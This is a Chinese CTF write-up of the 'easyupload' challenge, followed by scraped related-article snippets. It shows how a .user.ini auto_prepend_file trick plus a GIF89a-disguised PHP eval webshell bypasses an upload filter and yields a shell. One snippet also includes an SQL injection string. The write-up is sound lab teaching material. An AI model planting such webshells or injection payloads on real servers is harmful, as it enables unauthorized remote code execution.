攻防世界 easyupload

article/2025/7/8 5:02:49

本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行

点开链接

在这里插入图片描述

我们直接上传一句话木马

在这里插入图片描述

发现上传不了

说明可能被过滤了

所以我们需要绕过

绕过的点为检查后缀中是否有htaccess或ph

思路:

通过上传.user.ini以及正常jpg文件来进行getshell

.user.ini文件

解题前我们先了解下.user.ini文件

指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中:

auto_prepend_file=01.gif

01.gif是要包含的文件。

所以,我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。

具体可以参考以下文章

.user.ini文件构成的php后门

回到题目

先建立.user.ini文件如下:

GIF89a                  
auto_prepend_file=a.jpg      

注:文件头部的 GIF89a是为了绕过文件头内容检测,auto_prepend_file方法表示在php程序加载应用程序前加载指定的ph文件,其作用相当于php代码 require 或 include,这两方法可以文件包含嘛,就是包含的文件不存在就报错,存在的话直就行,不管你后缀是不是php,只有内容含有php代码就执行。

上传文件,用burpsuite抓包

将Content-Type改为image/jpeg

在这里插入图片描述

放行,发现文件上传成功

在这里插入图片描述

然后我们要上传一句话木马

构造php

GIF89a   
<?=eval($_POST['a']);?>

用cmd命令

合成图片的一句话木马

在这里插入图片描述

上传a.jpg,burpsuite抓包

发送到repeater

修改filename为a.php

将auto_pretend_file=a,jpg

修改为<?=eval($_POST['a']);?>

send一下

在这里插入图片描述

说明上传成功

F12打开调试器选择网络查看上传文件的地址

在这里插入图片描述

如图所示上传地址为:****/uploads/index.php

用蚁剑连接

在这里插入图片描述

在根目录下找到flag

在这里插入图片描述


http://chatgpt.dhexx.cn/article/94OLOFpx.shtml

相关文章

攻防世界——zorropub

1.查壳&#xff0c;无壳&#xff0c;64位。 2.IDA反编译。 逻辑:从最后的输出可知flag为v12&#xff0c;而v12是由v9与dword_6020C0的异或得来的。 v9是用srand和rand随机生成的伪随机数&#xff0c;并且这组伪随机数还要经过MD5加密5eba99aff105c9ff6a1a913e343fec67相同才可…

攻防世界 cookie

cookie:指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据(通常经过加密)。 鼠标右键check(检查)网页,点击application(应用程序) 可以看到左边有一个Cookie 点击后出现 "look here" 看到一个 "cookie.php"文件 访问后出现下面…

攻防世界Running

Running 题目描述&#xff1a;无 题目环境&#xff1a;https://download.csdn.net/download/m0_59188912/87016663 一个可执行文件&#xff0c;执行后显示error&#xff0c;尝试binwalk文件分离。 命令&#xff1a;binwalk -e run.exe浏览分离出来的文件。 末尾发现一个run.ex…

攻防世界unseping

感觉新手题里面最难的一题 ----------------------------------------------------------------正文 原题&#xff1a;攻防世界 这个题涉及的只是挺多的&#xff0c;不过主要就是正则表达式&#xff0c;php的反序列化 下面是代码分析环节&#xff1a; 因为涉及了php的序列化…

攻防世界Hong

Hong 题目描述&#xff1a;无 题目环境&#xff1a;https://download.csdn.net/download/m0_59188912/86864063 双击打开MP3文件&#xff0c;报错。 放到kali里面看看文件类型。 命令&#xff1a;file 文件名并不是mp3文件&#xff0c;用binwalk分离试试。 命令&#xff1a;b…

攻防世界inget

进入页面得到 请输入ID&#xff0c;并尝试绕过 思路&#xff1a;通过id进行sql注入 对url进行修改添加/?id1 or 11-- abc 原本当传入id的时候例如id1就是id1 现在传入id1 or 11-- -就变成了id1 or 11-- -,id1或者11返回都是true&#xff0c;-- abc表示注释后面代码。由此…

攻防世界fileclude

自学的困难&#xff0c;一个题10个没见过的知识点&#xff0c;唉&#xff0c;太难了... ----------------------------------------------------------------------------------下面是正文。 原题地址&#xff1a;攻防世界 从题目我们就能看出来这是一个文件包含漏洞的题&…

攻防世界

攻防世界 新手题 misc 前6道 不得不说&#xff0c;这道题真的是入门级别了。答案就在题目中&#xff0c;复制粘贴就好 flag{th1s_!s_a_d4m0_4la9} 把文件拖入kali中&#xff0c;在终端输入file 1 打开文件&#xff1b;输入strings 1|grep flag查找;看到隐藏文件 将文件挂…

攻防世界MISCall

攻防世界MISCall 1、题目 网址&#xff1a;攻防世界 2、原理及工具 原理&#xff1a;git信息泄露 git官网资料&#xff1a;https://www.git-scm.com/book/zh/v2 工具&#xff1a;kali、python 3、解题过程 下载下来的文件名字太长&#xff0c;先改个名字 rootkali:~/De…

攻防世界(新手篇)

作为刚刚进入reserve的小白&#xff0c;这几天在攻防世界的一些解题 no_strings_attached 一看没有exe&#xff0c;估计是linux的文件了&#xff0c;扔进C32Asm里 果然elf文件 先用扔进ida分析&#xff0c;发现主要函数authenticate&#xff0c;找到他的地址 OK&#xff0c…

攻防世界:command_execution

首先掌握命令执行漏洞&#xff08;Command Execution&#xff09;的知识。 命令执行漏洞即使用者可以直接在Web应用中执行系统命令&#xff0c;从而获取敏感信息或者拿下shell权限。其造成的原因是Web服务器对用户输入命令安全检测不足&#xff08;比如没加waf&#xff09;&am…

攻防世界——web新手区(全解)

当前网络安全形式越来越严重&#xff0c;我国也越来越重视&#xff0c;现在国内乃至国际上各个网络攻防大赛层出不穷&#xff0c;但是练习平台却还是很稀缺&#xff0c;可以说目前网上能够练习的平台也就只有几家&#xff0c;大多数的院校它们有自己的练习平台但并不公开&#…

CTF-攻防世界web新手入门篇

CTF-攻防世界web新手入门&#xff08;全&#xff09; 攻防世界网址1、view_source2、robots3、backup4、cookie5、disabled_button6、weak_auth7、simple_php8、get_post9、xff_referer10、webshell11、command_execution12、simple_js 攻防世界网址 https://adworld.xctf.org…

【愚公系列】2023年04月 攻防世界-MOBILE(Android2.0)

文章目录 前言一、Android2.01.题目2.答题 前言 下面介绍两个反编译工具 jadx是一个用于反编译Android APK文件的开源工具&#xff0c;静态反编译&#xff0c;查找索引功能强大jeb和IDA很像&#xff0c;属于动态调试&#xff0c;可以看java汇编也可以生成伪代码&#xff0c;还…

方法重载与方法重写

方法重载 目的&#xff1a;为了解决两个或多个功能相同的不同方法在命名时出现多个不同方法名的问题&#xff0c;重载把一组功能相同的方法命名为同一个方法名&#xff0c;这样就可以减轻开发者在方法的命名上的痛苦。 什么是方法重载 在同一个类中, 具有相同方法名的一组方…

java重写是什么?方法重写特点是什么?

Java属于入门容易&#xff0c;天花板却极高的编程语言。java重写是什么&#xff1f;对于java工程师来说技术的不断发展,需要不断学习java进阶知识。为了帮助大家巩固基础&#xff0c;本文解答了java重写是什么?方法重写特点是什么?等相关问题&#xff0c;希望可以帮到大家。 …

彻底搞懂为什么重写equals还要重写hashcode?

引言 原文链接&#xff1a;深入理解equals和hashCode 由于hashCode与HashMap有一定关系&#xff0c;推荐大家看一下我的这篇文章 HashMap源码大剖析 本文介绍java.lang.Object类中的两个方法&#xff1a;equals和hashCode。这两个方法大家应该都知道&#xff0c;但是这两个方…

Java方法的重写

一、 方法的重写&#xff08;Override&#xff09; 重写是子类对父类的允许访问的方法的实现过程进行重新编写&#xff0c;返回值和形参都不能改变。 重写的好处在于子类可以根据需要&#xff0c;定义特定属于自己的行为。也就是说子类能够&#xff0c;根据需要实现父类的方法。…

方法的重写

方法的重写和super关键字 1、重写&#xff1a; 在Java和其他一些高级面向对象的编程语言中&#xff0c;子类可继承父类中的方法&#xff0c;而不需要重新编写相同的方法。但有时子类并不想原封不动地继承父类的方法&#xff0c;而是想作一定的修改&#xff0c;这就需要采用方…

Java方法之重写

方法的重写是学习java面向对象过程中一个极其重要的知识点。那么什么叫方法的重写呢&#xff1f;举个例子&#xff08;再次摆上使用了多次的老图&#xff09;&#xff1a;              博主毕业后&#xff0c;终于继承了家里面的一笔巨额财产&#xff1a;一辆奇瑞…